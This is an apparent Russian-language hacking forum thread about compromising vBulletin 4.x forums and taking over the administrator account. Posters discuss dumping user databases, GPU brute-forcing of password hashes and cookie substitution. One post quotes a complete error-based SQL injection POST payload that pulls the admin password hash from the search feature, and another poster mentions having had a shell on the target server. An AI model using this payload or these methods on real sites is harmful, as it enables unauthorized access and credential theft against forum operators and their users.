Взлом vBulletin 4.x.x с последующией авторизацией в админский аккаунт

Какой к примеру?

 

Да как угодно.
Можно вывести соль и пароль определенного юзера, а можно слить себе б.д и искать там, если есть такая возможность.

Брути обычным брутом по видяхе.

 

Не в обиду ТС конечно, но нахер такую тему.

 

Базу уже слил,а вот как пароль там искать не пойму.

 

Здравствуйте, подскажите как получить эту самую страницу с ошибкой, о которой пишет автор (выделено зелёным цветом). Я делал как в статье, в Live HTTP Replay в Post запрос дописывал код

Code:

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

нажимаю повтор, а затем обновляю в Мозиле страницу с поиском??? Но ошибку на ней не выводит (вот здесь я может не то что-то делаю?)... Пробовал на разных версиях vBulletin

 

мда.. ачат уже не тот, что ранее

 

Еще бы.В этой теме идет подмена кук, содержащих хэш залогиненного юзера, а это боян страшнейший.

 

Я извиняюсь за беспокойство, но мне не понятен один пункт.
Идем на сайт lj.onas/md5 и делаем все, что там написано

Что вписывать в поле здесь пишем свой текст, из которого надо получить md5?

Спасибо за ответ.

 

ne aktualno

 

Думаю не только у меня был шелл на данном сервере.

 

здравствуйте за поздний час, все же, думаю, что тема все еще актуальна и стоит продолжить.
Сделал регистрацию чисто из-за того, чтобы посмотреть эти самые картинки опубликованные автором темы, которые не отображаются, видимо, их удалили. Только текст прочел и сам смысл понял.
Может, поможете?

 

Картинки в веб-архиве сохранились
http://web.archive.org/web/20120401205526/http://forum.antichat.ru/thread326318.html

 

Спасибо. Не знаете, где скачать старую версию Live HTTP Headers? Нигде не нахожу. Если есть, скиньте ссылку пожалуйста